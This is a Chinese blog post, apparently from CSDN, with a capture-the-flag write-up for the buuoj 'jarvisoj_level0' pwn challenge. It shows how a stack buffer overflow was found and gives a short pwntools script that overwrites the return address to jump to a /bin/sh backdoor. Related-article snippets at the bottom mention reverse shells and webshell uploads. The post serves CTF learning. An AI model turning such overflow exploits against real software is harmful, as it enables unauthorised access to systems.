buuoj jarvisoj_level0 writeup

最新推荐文章于 2023-12-01 14:07:06 发布
最新推荐文章于 2023-12-01 14:07:06 发布
阅读量97 收藏
点赞数 1
分类专栏: write up 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73605862/article/details/130919309
版权

题目(五):
【题型】PWN
【题目】jarvisoj_level0
【来源】(buuoj)https://buuoj.cn/challenges#jarvisoj_level0
【思路】栈溢出
【具体步骤】
Step1:checksec一下,发现是一个只开启了NX的64位程序。
在这里插入图片描述

step2:将文件放到IDApro下进行静态分析。
在这里插入图片描述

Step3:查看main函数,F5查看伪代码(如果键被占用,Fn+F5)
在这里插入图片描述

Step4:查看vulnerable_function()函数,发现buf定义了80个字节,猜测是栈溢出漏洞,然后查找一下后门函数。
在这里插入图片描述

Step5:shift+F12查看字符串,发现/bin/sh,点击进去查看,然后shift+x,查看地址为0x400596
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

Step6:编写exp,输入以后,ls查看文件,发现有一个flag.txt文件,cat 查看文件,得到flag。
源码为

from pwn import *
p=remote("node4.buuoj.cn",27786)
payload=b'a'*0x88+p64(0x400596)
p.sendline(payload)
p.interactive()

在这里插入图片描述

22的卡卡
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2015_ransomware_writeup
06-23
周末勒索软件分析上周,我妻子的一位同事设法捕获了一个垃圾勒索软件; 我相信她是从一封与此类似的电子邮件中得到的: 我们公司的快递员无法派送包裹。 REASON: Postal code contains an error.DELIVERY STATUS: ...
Coursera-Prediction_Assignment_Writeup-1
02-24
Prediction_Assignment_Writeup 同行评分作业:预测作业撰写 ##指示 人们经常做的一件事是量化他们从事某项特定活动的数量,但是他们很少量化他们做某件事的程度。 在此项目中,您的目标是使用来自6位参与者的...
jarvisoj_level
m0_75234353的博客
05-09 152
这题和前面最大的不同就是x64,就意味着参数调用方式的不同。不再是像32位一样,把参数压入栈中。而是先压入指定寄存器,第七个以后的再按逆序压入栈。
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1081
buuctf pwn
BUUCTF jarvisoj_level0
小白垃圾笔记2
04-25 459
vulnerable函数是一个漏洞函数:(存在缓溢出),我们只需要将buf溢出到返回地址,返回地址覆盖为sys函数地址即可。在main函数中调用了vulnerable_function()函数。小白垃圾做题笔记而已,不建议阅读。这道题感觉主要就是64位程序ebp=8。题目中给出了shellcode。我们直接将返回地址覆盖就好。exp:这里用下大佬的模板。
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 230
BUUCTF 做题练习
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 365
Buu CTF PWN题jarvisoj_level0的WriteUp
BUUCTF jarvisoj_level2
leesinalps的博客
12-01 122
可以看出利用的是格式化字符串的漏洞,需要我们修改var地址往下数第十四个,类似是数组的结构到var[13]为17,并且为LL就是long long int八个字节,,相当于64位的数据'\x11\x00\x00\x00\x00\x00\x00\x00'。如果用户输入的数据超出了数组的大小,就会覆盖内存中的其他数据,这可能导致不可预测的错误或者潜在的攻击。总之,这段代码的主要问题在于它没有进行充分的输入验证和保护,因此容易受到输入数据的恶意滥用,可能会导致安全漏洞。:这一行定义了一个名为。
[BUUCTF-pwn]——jarvisoj_level1
Y_peak的博客
03-17 414
[BUUCTF-pwn]——jarvisoj_level1 题目地址:https://buuoj.cn/challenges#jarvisoj_level1 第一种直接构造shellcode writeup 第二种泄露libc进行操作 from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26361) #p = process("./level1") elf = ELF("./level1") #libc = E
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 905
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
buuoj Pwn writeup 176-180
yongbaoii的博客
06-09 297
176 jarvisoj_itemboard 177 asis2016_b00ks 178 actf_2019_onerepeater 179 ciscn_2019_s_8 180 starctf_2019_girlfriend
WMCTF_2020官方WriteUp 高清PDF版
10-15
WMCTF_2020官方WriteUp.pdf WMCTF_2020官方WriteUp 高清PDF版
CTF_Competitions_Writeup:周大福比赛作品集
04-13
CTF_Competitions_Writeup 这是我解决的一些CTF竞赛挑战文章的集合。
空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透1
08-03
《空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透》这篇文章讲述了在Windows环境下针对Discuz! 3.4版本进行渗透测试的过程。本文将深入解析其中涉及的关键知识点,包括authkey的作用、Windows短文件名的安全...
自动化纹理魔法:Maya脚本在纹理贴图中的应用
最新发布
08-19
Maya脚本主要有两种形式:MEL(Maya Embedded Language)和Python。MEL是Maya的内置脚本语言,用于自动化任务、扩展Maya的功能以及自定义用户界面。MEL脚本可以快速创建对象、精确控制对象属性,以及执行复杂的场景管理任务。MEL的语法结构与C语言接近,支持强制语法和函数语法,是一种强类型语言,但通常允许隐式声明和类型转换。 Python脚本在Maya中的应用也非常广泛,特别是在Maya 2020及以后的版本中。Python提供了一种更为现代和灵活的方式来编写脚本,可以利用Python的强大库进行复杂的数据处理和自动化任务。Python脚本可以通过`maya.cmds`模块访问Maya的命令,实现与MEL相似的功能。 在Maya中,脚本可以通过“脚本编辑器”(Script Editor)进行编写和执行,也可以保存为`.mel`或`.py`文件以便重复使用。脚本编辑器提供了MEL和Python两种语言选项,允许用户在不同语言环境下编写和测试脚本。此外,Maya还支持将Python函数注册为MEL程序,以便在需要MEL脚本的地方使用Python代码。
反弹shell的几种获取方式.docx
08-19
一、反弹shell 二、python pty 方式 三、suid提权的方式 1、 suid权限的设置 2、 找出系统中具有suid权限的命令 3、 find提权 四、sessions的使用方法
IMG_20240819_173351.jpg
08-19
IMG_20240819_173351.jpg
Wireshark安装包(内有支持win7,win10,win11)总有一个版本适合
08-19
Wireshark是一款强大的网络协议分析器,主要用于捕获和深入分析网络流量,是网络故障排查、安全审计以及网络协议学习的重要工具。64位版本的Wireshark适用于运行64位操作系统的计算机,如Windows 7和8。在这个安装包中,主要包含两个文件:Wireshark-win64-2.2.1.exe是Wireshark的64位安装程序,下载帮助.txt则可能提供有关如何下载和安装软件的指导。 1. **Wireshark的基本功能**: - **数据包捕获**:Wireshark能够实时捕获来自网络接口的数据包,包括各种协议如TCP/IP、HTTP、FTP等。 - **协议解析**:它能解析并显示数据包的详细结构,帮助用户理解网络通信过程。 - **过滤与搜索**:提供强大的过滤器语言,可以快速定位特定类型的网络流量。同时,可以搜索数据包内容,便于分析。 - **颜色编码**:根据数据包的不同特性,如异常或潜在问题,使用不同颜色高亮显示。 - **解码与重构**:能够解码多种协议,并在重组TCP流时呈现会话的完整视图。
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ```php <?php error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] . "<br />"; } else { echo "Upload: " . $_FILES["upload"]["name"] . "<br />"; echo "Type: " . $_FILES["upload"]["type"] . "<br />"; echo "Size: " . ($_FILES["upload"]["size"] / 1024) . " Kb<br />"; move_uploaded_file($_FILES["upload"]["tmp_name"], "upload/" . $_FILES["upload"]["name"]); echo "Stored in: " . "upload/" . $_FILES["upload"]["name"]; } ?> ``` 从上述代码中我们可以发现,这是一个文件上传的代码,该代码运行后会将用户上传的文件存储到 `upload` 目录下。 但是,该代码没有对上传的文件类型进行限制,这意味着我们可以上传任何类型的文件,甚至是一些恶意的文件。我们可以尝试上传一些常见的恶意文件,比如 `webshell`。 我们可以在本地创建一个 `webshell.php` 文件,然后上传到服务器上的 `upload` 目录。上传完成后,我们可以访问 `http://xxx.xxx.xxx.xxx/upload/webshell.php` 来执行我们上传的 `webshell`。 最后,我们需要注意的是,该上传脚本没有做任何安全性检查,这意味着我们可以上传任意大小的文件,这可能会影响服务器的性能,甚至导致服务器崩溃。因此,在实际应用中,我们应该对上传的文件大小进行限制,同时对上传的文件类型进行检查,从而确保服务器的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值